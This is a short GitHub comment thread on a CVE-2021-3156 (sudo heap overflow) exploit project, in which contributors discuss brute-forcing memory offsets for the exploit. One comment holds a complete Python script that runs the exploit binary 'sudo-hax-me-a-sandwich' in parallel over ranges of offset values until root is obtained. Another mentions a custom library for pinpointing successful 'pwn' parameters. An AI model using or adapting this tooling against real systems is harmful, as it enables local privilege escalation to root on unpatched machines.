Comments (3)
The main branch now has some small wrapper script to try multi-threaded bruting (instructions in README)
from cve-2021-3156.
Hi,
I've just pushed #9 that allows manual definition of offsets from args,
this way you can do a "dumb" bruteforce by doing something like the Python code below.
Don't expect great results, cause finding the correct offset usually takes some trial and error.
```python
from multiprocessing import Pool
import itertools
import subprocess


def fuzz(a):
    w, x, y, z = a
    try:
        print("calling with {} {} {} {}".format(w, x, y, z))
        out = subprocess.check_output("./sudo-hax-me-a-sandwich {} {} {} {} 2>&1".format(w, x, y, z), shell=True)
    except subprocess.CalledProcessError as e:
        out = str(e)
        pass
    return out


if __name__ == '__main__':
    with Pool(5) as p:
        print(p.map(fuzz, itertools.product(range(40, 70), range(40, 70), range(50, 70), range(200, 220))))
```
from cve-2021-3156.
Yesterday I made one bruteforcing thingy myself, though I also used a custom lib that would exit()
with a distinct return code so I can exactly pinpoint which params/smash lengths get the pwn.
As I see you guys have already picked up on bruteforcing, my script isn't doing multiprocessing (it should) but hey it works.
Just saying it's there.
@TheZ3ro I see you have already noticed, I am planning to do parallelization (probably with asyncio, as you can simply spawn a bunch of processes with timeouts and pick up on their statuses after, should work afaik).
from cve-2021-3156.